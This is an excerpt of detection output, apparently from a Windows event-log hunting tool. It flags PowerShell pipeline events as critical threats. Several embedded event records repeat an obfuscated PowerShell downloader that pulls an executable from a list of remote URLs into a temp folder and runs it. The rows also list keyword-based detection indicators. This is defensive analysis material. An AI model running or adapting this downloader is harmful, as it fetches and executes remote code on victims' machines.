+    <Data>$Va5w3n8=((&apos;Q&apos;+&apos;2h&apos;)+(&apos;w9p&apos;+&apos;1&apos;));&amp;(&apos;ne&apos;+&apos;w-&apos;+&apos;item&apos;) $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::&quot;SecURi`T`ypRO`T`oCOL&quot; = (&apos;t&apos;+&apos;ls&apos;+&apos;1&apos;+(&apos;2, tl&apos;+&apos;s&apos;)+&apos;11&apos;+(&apos;, &apos;+&apos;tls&apos;));$Depssu0 = ((&apos;D&apos;+&apos;yx&apos;)+(&apos;x&apos;+&apos;ur4g&apos;)+&apos;x&apos;);$A74_j9r=(&apos;T&apos;+&apos;4&apos;+(&apos;gf45&apos;+&apos;h&apos;));$Fdkhtf_=$env:temp+((&apos;{0}&apos;+&apos;word{&apos;+&apos;0}&apos;+(&apos;2&apos;+&apos;01&apos;)+&apos;9{0}&apos;) -F [CHAr]92)+$Depssu0+(&apos;.&apos;+(&apos;ex&apos;+&apos;e&apos;));$O39nj1p=(&apos;J6&apos;+&apos;9l&apos;+(&apos;hm&apos;+&apos;h&apos;));$Z8i525z=&amp;(&apos;new-&apos;+&apos;obje&apos;+&apos;c&apos;+&apos;t&apos;) neT.WEbcLiENt;$Iwmfahs=((&apos;h&apos;+&apos;ttp&apos;)+(&apos;:&apos;+&apos;//&apos;)+(&apos;q&apos;+&apos;u&apos;+&apos;anticaelectro&apos;+&apos;n&apos;+&apos;ic&apos;)+(&apos;s.com&apos;+&apos;/&apos;)+&apos;w&apos;+&apos;p-&apos;+&apos;a&apos;+(&apos;d&apos;+&apos;min&apos;)+&apos;/&apos;+&apos;7A&apos;+(&apos;Tr78&apos;+&apos;/*&apos;+&apos;htt&apos;)+(&apos;p&apos;+&apos;s:/&apos;)+(&apos;/r&apos;+&apos;e&apos;)+&apos;be&apos;+(&apos;l&apos;+&apos;co&apos;)+&apos;m&apos;+&apos;.&apos;+(&apos;ch/&apos;+&apos;pi&apos;+&apos;c&apos;)+(&apos;ture&apos;+&apos;_&apos;)+(&apos;l&apos;+&apos;ibra&apos;+&apos;ry/bbCt&apos;)+(&apos;l&apos;+&apos;S/&apos;)+(&apos;*ht&apos;+&apos;tp&apos;+&apos;s:/&apos;)+(&apos;/re&apos;+&apos;al&apos;)+&apos;e&apos;+&apos;s&apos;+(&apos;tate&apos;+&apos;a&apos;)+(&apos;gen&apos;+&apos;t&apos;)+&apos;te&apos;+(&apos;am.co&apos;+&apos;m&apos;)+&apos;/&apos;+(&apos;163/Q&apos;+&apos;T&apos;)+&apos;d&apos;+(&apos;/&apos;+&apos;*ht&apos;+&apos;tps:&apos;)+&apos;//&apos;+(&apos;w&apos;+&apos;ww.&apos;)+(&apos;ri&apos;+&apos;dd&apos;)+(&apos;hi&apos;+&apos;display.&apos;+&apos;c&apos;+&apos;o&apos;)+&apos;m/&apos;+&apos;r&apos;+&apos;id&apos;+&apos;d&apos;+(&apos;hi&apos;+&apos;/1pKY/&apos;+&apos;*htt&apos;)+&apos;p&apos;+(&apos;:&apos;+&apos;//&apos;)+(&apos;radi&apos;+&apos;osu&apos;+&apos;bmit.com/&apos;+&apos;sear&apos;)+(&apos;ch_&apos;+&apos;tes&apos;+&apos;t&apos;)+&apos;/&apos;+&apos;p&apos;+(&apos;/*&apos;+&apos;h&apos;)+(&apos;ttp&apos;+&apos;:/&apos;)+&apos;/&apos;+(&apos;res&apos;+&apos;e&apos;)+&apos;ar&apos;+(&apos;ch&apos;+&apos;c&apos;)+&apos;he&apos;+&apos;m&apos;+(&apos;plu&apos;+&apos;s.&apos;+&apos;c&apos;)+(&apos;om/w&apos;+&apos;p-&apos;)+(&apos;a&apos;+&apos;dmin&apos;)+&apos;/1&apos;+(&apos;OC&apos;+&apos;C&apos;)+&apos;/&apos;+(&apos;*http:&apos;+&apos;/&apos;)+(&apos;/s&apos;+&apos;zymo&apos;)+(&apos;ns&apos;+&apos;zyp&apos;)+&apos;er&apos;+(&apos;sk&apos;+&apos;i&apos;)+(&apos;.&apos;+&apos;pl/a&apos;)+&apos;ss&apos;+(&apos;ets/&apos;+&apos;p&apos;)+&apos;k/&apos;).&quot;S`Plit&quot;([char]42);$Zxnbryr=((&apos;Dp&apos;+&apos;z9&apos;)+&apos;4&apos;+&apos;a6&apos;);foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.&quot;d`OWN`load`FIlE&quot;($Mqku5a2, $Fdkhtf_);$Lt8bjj7=(&apos;Ln&apos;+(&apos;wp&apos;+&apos;ag&apos;)+&apos;m&apos;);If ((.(&apos;Get-I&apos;+&apos;t&apos;+&apos;em&apos;) $Fdkhtf_).&quot;le`NgTH&quot; -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .(&apos;Invo&apos;+&apos;ke&apos;+&apos;-Item&apos;)($Fdkhtf_);$Nfgrgu9=((&apos;Qj6&apos;+&apos;bs&apos;)+&apos;x&apos;+&apos;n&apos;);break;$D7ypgo1=(&apos;Bv&apos;+(&apos;e&apos;+&apos;bc&apos;)+&apos;k0&apos;)}}catch{}}$Gmk6zmk=((&apos;Z2x&apos;+&apos;aaj&apos;)+&apos;0&apos;),	DetailSequence=1 
+	DetailTotal=1 
+ 
+	SequenceNumber=27 
+ 
+	UserId=DESKTOP-RIPCLIP\Clippy 
+	HostName=ConsoleHost 
+	HostVersion=5.1.19041.1 
+	HostId=7d5cb8a8-0a62-4f52-ba67-09f94d24e1b7 
+	HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 
+	EngineVersion=5.1.19041.1 
+	RunspaceId=b385ee3b-6b79-46f4-a038-8be3065370c3 
+	PipelineId=6 
+	ScriptName= 
+	CommandLine=$Va5w3n8=((&apos;Q&apos;+&apos;2h&apos;)+(&apos;w9p&apos;+&apos;1&apos;));&amp;(&apos;ne&apos;+&apos;w-&apos;+&apos;item&apos;) $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::&quot;SecURi`T`ypRO`T`oCOL&quot; = (&apos;t&apos;+&apos;ls&apos;+&apos;1&apos;+(&apos;2, tl&apos;+&apos;s&apos;)+&apos;11&apos;+(&apos;, &apos;+&apos;tls&apos;));$Depssu0 = ((&apos;D&apos;+&apos;yx&apos;)+(&apos;x&apos;+&apos;ur4g&apos;)+&apos;x&apos;);$A74_j9r=(&apos;T&apos;+&apos;4&apos;+(&apos;gf45&apos;+&apos;h&apos;));$Fdkhtf_=$env:temp+((&apos;{0}&apos;+&apos;word{&apos;+&apos;0}&apos;+(&apos;2&apos;+&apos;01&apos;)+&apos;9{0}&apos;) -F [CHAr]92)+$Depssu0+(&apos;.&apos;+(&apos;ex&apos;+&apos;e&apos;));$O39nj1p=(&apos;J6&apos;+&apos;9l&apos;+(&apos;hm&apos;+&apos;h&apos;));$Z8i525z=&amp;(&apos;new-&apos;+&apos;obje&apos;+&apos;c&apos;+&apos;t&apos;) neT.WEbcLiENt;$Iwmfahs=((&apos;h&apos;+&apos;ttp&apos;)+(&apos;:&apos;+&apos;//&apos;)+(&apos;q&apos;+&apos;u&apos;+&apos;anticaelectro&apos;+&apos;n&apos;+&apos;ic&apos;)+(&apos;s.com&apos;+&apos;/&apos;)+&apos;w&apos;+&apos;p-&apos;+&apos;a&apos;+(&apos;d&apos;+&apos;min&apos;)+&apos;/&apos;+&apos;7A&apos;+(&apos;Tr78&apos;+&apos;/*&apos;+&apos;htt&apos;)+(&apos;p&apos;+&apos;s:/&apos;)+(&apos;/r&apos;+&apos;e&apos;)+&apos;be&apos;+(&apos;l&apos;+&apos;co&apos;)+&apos;m&apos;+&apos;.&apos;+(&apos;ch/&apos;+&apos;pi&apos;+&apos;c&apos;)+(&apos;ture&apos;+&apos;_&apos;)+(&apos;l&apos;+&apos;ibra&apos;+&apos;ry/bbCt&apos;)+(&apos;l&apos;+&apos;S/&apos;)+(&apos;*ht&apos;+&apos;tp&apos;+&apos;s:/&apos;)+(&apos;/re&apos;+&apos;al&apos;)+&apos;e&apos;+&apos;s&apos;+(&apos;tate&apos;+&apos;a&apos;)+(&apos;gen&apos;+&apos;t&apos;)+&apos;te&apos;+(&apos;am.co&apos;+&apos;m&apos;)+&apos;/&apos;+(&apos;163/Q&apos;+&apos;T&apos;)+&apos;d&apos;+(&apos;/&apos;+&apos;*ht&apos;+&apos;tps:&apos;)+&apos;//&apos;+(&apos;w&apos;+&apos;ww.&apos;)+(&apos;ri&apos;+&apos;dd&apos;)+(&apos;hi&apos;+&apos;display.&apos;+&apos;c&apos;+&apos;o&apos;)+&apos;m/&apos;+&apos;r&apos;+&apos;id&apos;+&apos;d&apos;+(&apos;hi&apos;+&apos;/1pKY/&apos;+&apos;*htt&apos;)+&apos;p&apos;+(&apos;:&apos;+&apos;//&apos;)+(&apos;radi&apos;+&apos;osu&apos;+&apos;bmit.com/&apos;+&apos;sear&apos;)+(&apos;ch_&apos;+&apos;tes&apos;+&apos;t&apos;)+&apos;/&apos;+&apos;p&apos;+(&apos;/*&apos;+&apos;h&apos;)+(&apos;ttp&apos;+&apos;:/&apos;)+&apos;/&apos;+(&apos;res&apos;+&apos;e&apos;)+&apos;ar&apos;+(&apos;ch&apos;+&apos;c&apos;)+&apos;he&apos;+&apos;m&apos;+(&apos;plu&apos;+&apos;s.&apos;+&apos;c&apos;)+(&apos;om/w&apos;+&apos;p-&apos;)+(&apos;a&apos;+&apos;dmin&apos;)+&apos;/1&apos;+(&apos;OC&apos;+&apos;C&apos;)+&apos;/&apos;+(&apos;*http:&apos;+&apos;/&apos;)+(&apos;/s&apos;+&apos;zymo&apos;)+(&apos;ns&apos;+&apos;zyp&apos;)+&apos;er&apos;+(&apos;sk&apos;+&apos;i&apos;)+(&apos;.&apos;+&apos;pl/a&apos;)+&apos;ss&apos;+(&apos;ets/&apos;+&apos;p&apos;)+&apos;k/&apos;).&quot;S`Plit&quot;([char]42);$Zxnbryr=((&apos;Dp&apos;+&apos;z9&apos;)+&apos;4&apos;+&apos;a6&apos;);foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.&quot;d`OWN`load`FIlE&quot;($Mqku5a2, $Fdkhtf_);$Lt8bjj7=(&apos;Ln&apos;+(&apos;wp&apos;+&apos;ag&apos;)+&apos;m&apos;);If ((.(&apos;Get-I&apos;+&apos;t&apos;+&apos;em&apos;) $Fdkhtf_).&quot;le`NgTH&quot; -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .(&apos;Invo&apos;+&apos;ke&apos;+&apos;-Item&apos;)($Fdkhtf_);$Nfgrgu9=((&apos;Qj6&apos;+&apos;bs&apos;)+&apos;x&apos;+&apos;n&apos;);break;$D7ypgo1=(&apos;Bv&apos;+(&apos;e&apos;+&apos;bc&apos;)+&apos;k0&apos;)}}catch{}}$Gmk6zmk=((&apos;Z2x&apos;+&apos;aaj&apos;)+&apos;0&apos;),CommandInvocation(Get-Item): &quot;Get-Item&quot; 
+ParameterBinding(Get-Item): name=&quot;Path&quot;; value=&quot;C:\Users\Clippy\AppData\Local\Temp\word\2019\Dyxxur4gx.exe&quot; 
+</Data>
+    <Binary></Binary>
+  </EventData>
+</Event>",DESKTOP-RIPCLIP,Windows PowerShell
+Powershell Executing Pipeline - Suspicious Powershell Commands detected,1598418569.11515,2020-08-26T09:09:29.115150+04:00,,Threat,Critical,"Found User (DESKTOP-RIPCLIP\Clippy) run Suspicious PowerShell commands that include (New-Object,Net.WebClient,Net.WebClient,New-Object,Net.WebClient,Net.WebClient,$env:TEMP\,char,-f , -Force,foreach,$Env:Temp\,Net.WebClient,new-object,\Windows\System32) in event with Command Line ($Va5w3n8=((&apos;Q&apos;+&apos;2h&apos;)+(&apos;w9p&apos;+&apos;1&apos;));&amp;(&apos;ne&apos;+&apos;w-&apos;+&apos;item&apos;) $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::&quot;SecURi`T`ypRO`T`oCOL&quot; = (&apos;t&apos;+&apos;ls&apos;+&apos;1&apos;+(&apos;2, tl&apos;+&apos;s&apos;)+&apos;11&apos;+(&apos;, &apos;+&apos;tls&apos;));$Depssu0 = ((&apos;D&apos;+&apos;yx&apos;)+(&apos;x&apos;+&apos;ur4g&apos;)+&apos;x&apos;);$A74_j9r=(&apos;T&apos;+&apos;4&apos;+(&apos;gf45&apos;+&apos;h&apos;));$Fdkhtf_=$env:temp+((&apos;{0}&apos;+&apos;word{&apos;+&apos;0}&apos;+(&apos;2&apos;+&apos;01&apos;)+&apos;9{0}&apos;) -F [CHAr]92)+$Depssu0+(&apos;.&apos;+(&apos;ex&apos;+&apos;e&apos;));$O39nj1p=(&apos;J6&apos;+&apos;9l&apos;+(&apos;hm&apos;+&apos;h&apos;));$Z8i525z=&amp;(&apos;new-&apos;+&apos;obje&apos;+&apos;c&apos;+&apos;t&apos;) neT.WEbcLiENt;$Iwmfahs=((&apos;h&apos;+&apos;ttp&apos;)+(&apos;:&apos;+&apos;//&apos;)+(&apos;q&apos;+&apos;u&apos;+&apos;anticaelectro&apos;+&apos;n&apos;+&apos;ic&apos;)+(&apos;s.com&apos;+&apos;/&apos;)+&apos;w&apos;+&apos;p-&apos;+&apos;a&apos;+(&apos;d&apos;+&apos;min&apos;)+&apos;/&apos;+&apos;7A&apos;+(&apos;Tr78&apos;+&apos;/*&apos;+&apos;htt&apos;)+(&apos;p&apos;+&apos;s:/&apos;)+(&apos;/r&apos;+&apos;e&apos;)+&apos;be&apos;+(&apos;l&apos;+&apos;co&apos;)+&apos;m&apos;+&apos;.&apos;+(&apos;ch/&apos;+&apos;pi&apos;+&apos;c&apos;)+(&apos;ture&apos;+&apos;_&apos;)+(&apos;l&apos;+&apos;ibra&apos;+&apos;ry/bbCt&apos;)+(&apos;l&apos;+&apos;S/&apos;)+(&apos;*ht&apos;+&apos;tp&apos;+&apos;s:/&apos;)+(&apos;/re&apos;+&apos;al&apos;)+&apos;e&apos;+&apos;s&apos;+(&apos;tate&apos;+&apos;a&apos;)+(&apos;gen&apos;+&apos;t&apos;)+&apos;te&apos;+(&apos;am.co&apos;+&apos;m&apos;)+&apos;/&apos;+(&apos;163/Q&apos;+&apos;T&apos;)+&apos;d&apos;+(&apos;/&apos;+&apos;*ht&apos;+&apos;tps:&apos;)+&apos;//&apos;+(&apos;w&apos;+&apos;ww.&apos;)+(&apos;ri&apos;+&apos;dd&apos;)+(&apos;hi&apos;+&apos;display.&apos;+&apos;c&apos;+&apos;o&apos;)+&apos;m/&apos;+&apos;r&apos;+&apos;id&apos;+&apos;d&apos;+(&apos;hi&apos;+&apos;/1pKY/&apos;+&apos;*htt&apos;)+&apos;p&apos;+(&apos;:&apos;+&apos;//&apos;)+(&apos;radi&apos;+&apos;osu&apos;+&apos;bmit.com/&apos;+&apos;sear&apos;)+(&apos;ch_&apos;+&apos;tes&apos;+&apos;t&apos;)+&apos;/&apos;+&apos;p&apos;+(&apos;/*&apos;+&apos;h&apos;)+(&apos;ttp&apos;+&apos;:/&apos;)+&apos;/&apos;+(&apos;res&apos;+&apos;e&apos;)+&apos;ar&apos;+(&apos;ch&apos;+&apos;c&apos;)+&apos;he&apos;+&apos;m&apos;+(&apos;plu&apos;+&apos;s.&apos;+&apos;c&apos;)+(&apos;om/w&apos;+&apos;p-&apos;)+(&apos;a&apos;+&apos;dmin&apos;)+&apos;/1&apos;+(&apos;OC&apos;+&apos;C&apos;)+&apos;/&apos;+(&apos;*http:&apos;+&apos;/&apos;)+(&apos;/s&apos;+&apos;zymo&apos;)+(&apos;ns&apos;+&apos;zyp&apos;)+&apos;er&apos;+(&apos;sk&apos;+&apos;i&apos;)+(&apos;.&apos;+&apos;pl/a&apos;)+&apos;ss&apos;+(&apos;ets/&apos;+&apos;p&apos;)+&apos;k/&apos;).&quot;S`Plit&quot;([char]42);$Zxnbryr=((&apos;Dp&apos;+&apos;z9&apos;)+&apos;4&apos;+&apos;a6&apos;);foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.&quot;d`OWN`load`FIlE&quot;($Mqku5a2, $Fdkhtf_);$Lt8bjj7=(&apos;Ln&apos;+(&apos;wp&apos;+&apos;ag&apos;)+&apos;m&apos;);If ((.(&apos;Get-I&apos;+&apos;t&apos;+&apos;em&apos;) $Fdkhtf_).&quot;le`NgTH&quot; -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .(&apos;Invo&apos;+&apos;ke&apos;+&apos;-Item&apos;)($Fdkhtf_);$Nfgrgu9=((&apos;Qj6&apos;+&apos;bs&apos;)+&apos;x&apos;+&apos;n&apos;);break;$D7ypgo1=(&apos;Bv&apos;+(&apos;e&apos;+&apos;bc&apos;)+&apos;k0&apos;)}}catch{}}$Gmk6zmk=((&apos;Z2x&apos;+&apos;aaj&apos;)+&apos;0&apos;),CommandInvocation(New-Object): &quot;New-Object&quot;) and full command (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) ",800,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""PowerShell"">
+    </Provider>
+    <EventID Qualifiers=""0"">800</EventID>
+    <Version>0</Version>
+    <Level>4</Level>
+    <Task>8</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x80000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-08-26T05:09:29.115150Z"">
+    </TimeCreated>
+    <EventRecordID>787</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""0"" ThreadID=""0"">
+    </Execution>
+    <Channel>Windows PowerShell</Channel>
+    <Computer>DESKTOP-RIPCLIP</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data>$Va5w3n8=((&apos;Q&apos;+&apos;2h&apos;)+(&apos;w9p&apos;+&apos;1&apos;));&amp;(&apos;ne&apos;+&apos;w-&apos;+&apos;item&apos;) $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::&quot;SecURi`T`ypRO`T`oCOL&quot; = (&apos;t&apos;+&apos;ls&apos;+&apos;1&apos;+(&apos;2, tl&apos;+&apos;s&apos;)+&apos;11&apos;+(&apos;, &apos;+&apos;tls&apos;));$Depssu0 = ((&apos;D&apos;+&apos;yx&apos;)+(&apos;x&apos;+&apos;ur4g&apos;)+&apos;x&apos;);$A74_j9r=(&apos;T&apos;+&apos;4&apos;+(&apos;gf45&apos;+&apos;h&apos;));$Fdkhtf_=$env:temp+((&apos;{0}&apos;+&apos;word{&apos;+&apos;0}&apos;+(&apos;2&apos;+&apos;01&apos;)+&apos;9{0}&apos;) -F [CHAr]92)+$Depssu0+(&apos;.&apos;+(&apos;ex&apos;+&apos;e&apos;));$O39nj1p=(&apos;J6&apos;+&apos;9l&apos;+(&apos;hm&apos;+&apos;h&apos;));$Z8i525z=&amp;(&apos;new-&apos;+&apos;obje&apos;+&apos;c&apos;+&apos;t&apos;) neT.WEbcLiENt;$Iwmfahs=((&apos;h&apos;+&apos;ttp&apos;)+(&apos;:&apos;+&apos;//&apos;)+(&apos;q&apos;+&apos;u&apos;+&apos;anticaelectro&apos;+&apos;n&apos;+&apos;ic&apos;)+(&apos;s.com&apos;+&apos;/&apos;)+&apos;w&apos;+&apos;p-&apos;+&apos;a&apos;+(&apos;d&apos;+&apos;min&apos;)+&apos;/&apos;+&apos;7A&apos;+(&apos;Tr78&apos;+&apos;/*&apos;+&apos;htt&apos;)+(&apos;p&apos;+&apos;s:/&apos;)+(&apos;/r&apos;+&apos;e&apos;)+&apos;be&apos;+(&apos;l&apos;+&apos;co&apos;)+&apos;m&apos;+&apos;.&apos;+(&apos;ch/&apos;+&apos;pi&apos;+&apos;c&apos;)+(&apos;ture&apos;+&apos;_&apos;)+(&apos;l&apos;+&apos;ibra&apos;+&apos;ry/bbCt&apos;)+(&apos;l&apos;+&apos;S/&apos;)+(&apos;*ht&apos;+&apos;tp&apos;+&apos;s:/&apos;)+(&apos;/re&apos;+&apos;al&apos;)+&apos;e&apos;+&apos;s&apos;+(&apos;tate&apos;+&apos;a&apos;)+(&apos;gen&apos;+&apos;t&apos;)+&apos;te&apos;+(&apos;am.co&apos;+&apos;m&apos;)+&apos;/&apos;+(&apos;163/Q&apos;+&apos;T&apos;)+&apos;d&apos;+(&apos;/&apos;+&apos;*ht&apos;+&apos;tps:&apos;)+&apos;//&apos;+(&apos;w&apos;+&apos;ww.&apos;)+(&apos;ri&apos;+&apos;dd&apos;)+(&apos;hi&apos;+&apos;display.&apos;+&apos;c&apos;+&apos;o&apos;)+&apos;m/&apos;+&apos;r&apos;+&apos;id&apos;+&apos;d&apos;+(&apos;hi&apos;+&apos;/1pKY/&apos;+&apos;*htt&apos;)+&apos;p&apos;+(&apos;:&apos;+&apos;//&apos;)+(&apos;radi&apos;+&apos;osu&apos;+&apos;bmit.com/&apos;+&apos;sear&apos;)+(&apos;ch_&apos;+&apos;tes&apos;+&apos;t&apos;)+&apos;/&apos;+&apos;p&apos;+(&apos;/*&apos;+&apos;h&apos;)+(&apos;ttp&apos;+&apos;:/&apos;)+&apos;/&apos;+(&apos;res&apos;+&apos;e&apos;)+&apos;ar&apos;+(&apos;ch&apos;+&apos;c&apos;)+&apos;he&apos;+&apos;m&apos;+(&apos;plu&apos;+&apos;s.&apos;+&apos;c&apos;)+(&apos;om/w&apos;+&apos;p-&apos;)+(&apos;a&apos;+&apos;dmin&apos;)+&apos;/1&apos;+(&apos;OC&apos;+&apos;C&apos;)+&apos;/&apos;+(&apos;*http:&apos;+&apos;/&apos;)+(&apos;/s&apos;+&apos;zymo&apos;)+(&apos;ns&apos;+&apos;zyp&apos;)+&apos;er&apos;+(&apos;sk&apos;+&apos;i&apos;)+(&apos;.&apos;+&apos;pl/a&apos;)+&apos;ss&apos;+(&apos;ets/&apos;+&apos;p&apos;)+&apos;k/&apos;).&quot;S`Plit&quot;([char]42);$Zxnbryr=((&apos;Dp&apos;+&apos;z9&apos;)+&apos;4&apos;+&apos;a6&apos;);foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.&quot;d`OWN`load`FIlE&quot;($Mqku5a2, $Fdkhtf_);$Lt8bjj7=(&apos;Ln&apos;+(&apos;wp&apos;+&apos;ag&apos;)+&apos;m&apos;);If ((.(&apos;Get-I&apos;+&apos;t&apos;+&apos;em&apos;) $Fdkhtf_).&quot;le`NgTH&quot; -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .(&apos;Invo&apos;+&apos;ke&apos;+&apos;-Item&apos;)($Fdkhtf_);$Nfgrgu9=((&apos;Qj6&apos;+&apos;bs&apos;)+&apos;x&apos;+&apos;n&apos;);break;$D7ypgo1=(&apos;Bv&apos;+(&apos;e&apos;+&apos;bc&apos;)+&apos;k0&apos;)}}catch{}}$Gmk6zmk=((&apos;Z2x&apos;+&apos;aaj&apos;)+&apos;0&apos;),	DetailSequence=1 
+	DetailTotal=1 
+ 
+	SequenceNumber=23 
+ 
+	UserId=DESKTOP-RIPCLIP\Clippy 
+	HostName=ConsoleHost 
+	HostVersion=5.1.19041.1 
+	HostId=7d5cb8a8-0a62-4f52-ba67-09f94d24e1b7 
+	HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 
+	EngineVersion=5.1.19041.1 
+	RunspaceId=b385ee3b-6b79-46f4-a038-8be3065370c3 
+	PipelineId=6 
+	ScriptName= 
+	CommandLine=$Va5w3n8=((&apos;Q&apos;+&apos;2h&apos;)+(&apos;w9p&apos;+&apos;1&apos;));&amp;(&apos;ne&apos;+&apos;w-&apos;+&apos;item&apos;) $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::&quot;SecURi`T`ypRO`T`oCOL&quot; = (&apos;t&apos;+&apos;ls&apos;+&apos;1&apos;+(&apos;2, tl&apos;+&apos;s&apos;)+&apos;11&apos;+(&apos;, &apos;+&apos;tls&apos;));$Depssu0 = ((&apos;D&apos;+&apos;yx&apos;)+(&apos;x&apos;+&apos;ur4g&apos;)+&apos;x&apos;);$A74_j9r=(&apos;T&apos;+&apos;4&apos;+(&apos;gf45&apos;+&apos;h&apos;));$Fdkhtf_=$env:temp+((&apos;{0}&apos;+&apos;word{&apos;+&apos;0}&apos;+(&apos;2&apos;+&apos;01&apos;)+&apos;9{0}&apos;) -F [CHAr]92)+$Depssu0+(&apos;.&apos;+(&apos;ex&apos;+&apos;e&apos;));$O39nj1p=(&apos;J6&apos;+&apos;9l&apos;+(&apos;hm&apos;+&apos;h&apos;));$Z8i525z=&amp;(&apos;new-&apos;+&apos;obje&apos;+&apos;c&apos;+&apos;t&apos;) neT.WEbcLiENt;$Iwmfahs=((&apos;h&apos;+&apos;ttp&apos;)+(&apos;:&apos;+&apos;//&apos;)+(&apos;q&apos;+&apos;u&apos;+&apos;anticaelectro&apos;+&apos;n&apos;+&apos;ic&apos;)+(&apos;s.com&apos;+&apos;/&apos;)+&apos;w&apos;+&apos;p-&apos;+&apos;a&apos;+(&apos;d&apos;+&apos;min&apos;)+&apos;/&apos;+&apos;7A&apos;+(&apos;Tr78&apos;+&apos;/*&apos;+&apos;htt&apos;)+(&apos;p&apos;+&apos;s:/&apos;)+(&apos;/r&apos;+&apos;e&apos;)+&apos;be&apos;+(&apos;l&apos;+&apos;co&apos;)+&apos;m&apos;+&apos;.&apos;+(&apos;ch/&apos;+&apos;pi&apos;+&apos;c&apos;)+(&apos;ture&apos;+&apos;_&apos;)+(&apos;l&apos;+&apos;ibra&apos;+&apos;ry/bbCt&apos;)+(&apos;l&apos;+&apos;S/&apos;)+(&apos;*ht&apos;+&apos;tp&apos;+&apos;s:/&apos;)+(&apos;/re&apos;+&apos;al&apos;)+&apos;e&apos;+&apos;s&apos;+(&apos;tate&apos;+&apos;a&apos;)+(&apos;gen&apos;+&apos;t&apos;)+&apos;te&apos;+(&apos;am.co&apos;+&apos;m&apos;)+&apos;/&apos;+(&apos;163/Q&apos;+&apos;T&apos;)+&apos;d&apos;+(&apos;/&apos;+&apos;*ht&apos;+&apos;tps:&apos;)+&apos;//&apos;+(&apos;w&apos;+&apos;ww.&apos;)+(&apos;ri&apos;+&apos;dd&apos;)+(&apos;hi&apos;+&apos;display.&apos;+&apos;c&apos;+&apos;o&apos;)+&apos;m/&apos;+&apos;r&apos;+&apos;id&apos;+&apos;d&apos;+(&apos;hi&apos;+&apos;/1pKY/&apos;+&apos;*htt&apos;)+&apos;p&apos;+(&apos;:&apos;+&apos;//&apos;)+(&apos;radi&apos;+&apos;osu&apos;+&apos;bmit.com/&apos;+&apos;sear&apos;)+(&apos;ch_&apos;+&apos;tes&apos;+&apos;t&apos;)+&apos;/&apos;+&apos;p&apos;+(&apos;/*&apos;+&apos;h&apos;)+(&apos;ttp&apos;+&apos;:/&apos;)+&apos;/&apos;+(&apos;res&apos;+&apos;e&apos;)+&apos;ar&apos;+(&apos;ch&apos;+&apos;c&apos;)+&apos;he&apos;+&apos;m&apos;+(&apos;plu&apos;+&apos;s.&apos;+&apos;c&apos;)+(&apos;om/w&apos;+&apos;p-&apos;)+(&apos;a&apos;+&apos;dmin&apos;)+&apos;/1&apos;+(&apos;OC&apos;+&apos;C&apos;)+&apos;/&apos;+(&apos;*http:&apos;+&apos;/&apos;)+(&apos;/s&apos;+&apos;zymo&apos;)+(&apos;ns&apos;+&apos;zyp&apos;)+&apos;er&apos;+(&apos;sk&apos;+&apos;i&apos;)+(&apos;.&apos;+&apos;pl/a&apos;)+&apos;ss&apos;+(&apos;ets/&apos;+&apos;p&apos;)+&apos;k/&apos;).&quot;S`Plit&quot;([char]42);$Zxnbryr=((&apos;Dp&apos;+&apos;z9&apos;)+&apos;4&apos;+&apos;a6&apos;);foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.&quot;d`OWN`load`FIlE&quot;($Mqku5a2, $Fdkhtf_);$Lt8bjj7=(&apos;Ln&apos;+(&apos;wp&apos;+&apos;ag&apos;)+&apos;m&apos;);If ((.(&apos;Get-I&apos;+&apos;t&apos;+&apos;em&apos;) $Fdkhtf_).&quot;le`NgTH&quot; -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .(&apos;Invo&apos;+&apos;ke&apos;+&apos;-Item&apos;)($Fdkhtf_);$Nfgrgu9=((&apos;Qj6&apos;+&apos;bs&apos;)+&apos;x&apos;+&apos;n&apos;);break;$D7ypgo1=(&apos;Bv&apos;+(&apos;e&apos;+&apos;bc&apos;)+&apos;k0&apos;)}}catch{}}$Gmk6zmk=((&apos;Z2x&apos;+&apos;aaj&apos;)+&apos;0&apos;),CommandInvocation(New-Object): &quot;New-Object&quot; 
+ParameterBinding(New-Object): name=&quot;TypeName&quot;; value=&quot;neT.WEbcLiENt&quot; 
+</Data>
+    <Binary></Binary>
+  </EventData>
+</Event>",DESKTOP-RIPCLIP,Windows PowerShell
+Powershell Executing Pipeline - Suspicious Powershell Commands detected,1598418573.505877,2020-08-26T09:09:33.505877+04:00,,Threat,Critical,"Found User (DESKTOP-RIPCLIP\Clippy) run Suspicious PowerShell commands that include (Net.WebClient,Net.WebClient,Net.WebClient,Net.WebClient,$env:TEMP\,char,-f , -Force,foreach,$Env:Temp\,invoke,Net.WebClient,\Windows\System32) in event with Command Line ($Va5w3n8=((&apos;Q&apos;+&apos;2h&apos;)+(&apos;w9p&apos;+&apos;1&apos;));&amp;(&apos;ne&apos;+&apos;w-&apos;+&apos;item&apos;) $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::&quot;SecURi`T`ypRO`T`oCOL&quot; = (&apos;t&apos;+&apos;ls&apos;+&apos;1&apos;+(&apos;2, tl&apos;+&apos;s&apos;)+&apos;11&apos;+(&apos;, &apos;+&apos;tls&apos;));$Depssu0 = 